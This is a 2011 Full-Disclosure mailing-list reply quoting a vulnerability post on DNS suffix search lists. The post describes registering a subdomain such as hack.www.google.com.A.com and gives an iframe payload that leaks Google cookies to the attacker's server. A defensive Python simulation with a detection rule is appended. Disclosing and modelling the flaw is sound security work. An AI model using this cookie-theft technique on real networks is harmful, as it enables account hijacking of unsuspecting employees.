Message-ID: <20110513113450.GB2720@DataIX.net>
Date: Fri, 13 May 2011 07:34:50 -0400
From: Jason Hellenthal <jhell@...aIX.net>
To: yu xi4o <evil.xi4oyu@...il.com>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: Dns-suffix may lead to cross-domain and other security problems

yu,

Are you related to MustntLive ?

On Fri, May 13, 2011 at 12:07:37PM +0800, yu xi4o wrote:
> We all know that dhcpd can set the DNS suffix for its clients. For example,
> if we set the DNS suffix to "test.com", then while doing name resolution for
> a name such as www.xxx.com, every client using this DHCP server will try the
> following order:
>
> 1. The system tries to look up www.xxx.com. If the DNS server finds an IP
>    address, the client goes on to use this IP.
> 2. Otherwise, the system automatically appends the DNS suffix and tries
>    again (this is only partly true, cos Win7 only appends the DNS suffix to
>    names that don't contain a '.'). This time the query is
>    www.xxx.com.test.com. If the DNS server returns an address, the program
>    happily uses this result as the right answer. This brings some
>    convenience, but may lead to some problems, for example cross-domain.
>
> Scenario:
> 1. Company A.COM provides secondary domain registration for its customers
>    (e.g. a free blog system). People can register any username they want,
>    for example "test"; then their space will be test.A.com. This works fine.
>
> 2. The company's internal network uses a DHCP server which automatically
>    adds an A.COM DNS suffix to its clients.
>
> An attacker wants to gather some employees' Gmail accounts. He can easily
> register a username like hack.www.google.com; the full domain name will then
> be hack.www.google.com.A.com.
>
> When A.com's employees browse a web site containing an iframe such as
> <iframe src="https://hack.www.google.com/accounts" >fuck it up</iframe>
>
> the employees' systems will
> 1. try to resolve hack.www.google.com and get a false answer (NXDOMAIN);
> 2. then try hack.www.google.com.A.com and get the attacker's host IP addr!!!
>
> But the browser doesn't know this and will happily send Google's cookies to
> the attacker's web server.
>
> Success on Windows XP / Ubuntu 11.04 with IE, FF, Chrome~:) Failed on Win7
> cos it only adds the DNS suffix to DNS names that don't contain a '.'.
>
> GAME OVER!!!
>
> Use your brains and think of more potential attack vectors!!
>
> Find more vulns at http://www.wooyun.org/bugs/wooyun-2010-02113
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

--
Regards, (jhell)
Jason Hellenthal
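The suffix search-list behaviour and the Windows 7 caveat from the quoted post, modelled as an added example (not code from the original message). The zone table, the suffix list and the `flag_crossings` detection rule are constructed for the illustration; it also shows that an absolute name (trailing dot) is never completed.

```python
# Constructed zone data for the simulation: anything not listed is NXDOMAIN.
ZONE = {
    "intranet.a.com.": "192.0.2.10",              # legitimate internal host
    "test.a.com.": "192.0.2.11",                  # a customer's free blog subdomain
    "hack.www.google.com.a.com.": "192.0.2.12",   # the third-party subdomain from the post
}

def lookup(fqdn):
    """Authoritative answer for an absolute name, or None for NXDOMAIN."""
    return ZONE.get(fqdn if fqdn.endswith(".") else fqdn + ".")

def resolve(name, suffixes, single_label_only):
    """Stub resolver with a DNS suffix search list.

    single_label_only=False: the XP/Ubuntu behaviour in the post (after NXDOMAIN
    the suffix is appended to any name). single_label_only=True: the Windows 7
    behaviour (suffix appended only when the name contains no '.'). A trailing
    dot marks an absolute name and is never completed.
    Returns (ip, name_that_actually_answered)."""
    ip = lookup(name)
    if ip is not None or name.endswith("."):
        return ip, name
    if single_label_only and "." in name:
        return None, name
    for suffix in suffixes:
        candidate = f"{name}.{suffix}"
        ip = lookup(candidate)
        if ip is not None:
            return ip, candidate
    return None, name

def flag_crossings(names, suffixes, single_label_only):
    """Detection rule: multi-label names that only resolved after a suffix was
    appended. The application still believes it reached the original name,
    which is exactly the cookie-scoping problem the post describes."""
    flagged = []
    for name in names:
        ip, answered = resolve(name, suffixes, single_label_only)
        if ip is not None and "." in name and answered != name:
            flagged.append((name, answered, ip))
    return flagged

if __name__ == "__main__":
    queries = ["intranet", "test", "hack.www.google.com", "hack.www.google.com."]
    for policy in (False, True):
        print("single_label_only =", policy, flag_crossings(queries, ["a.com"], policy))
```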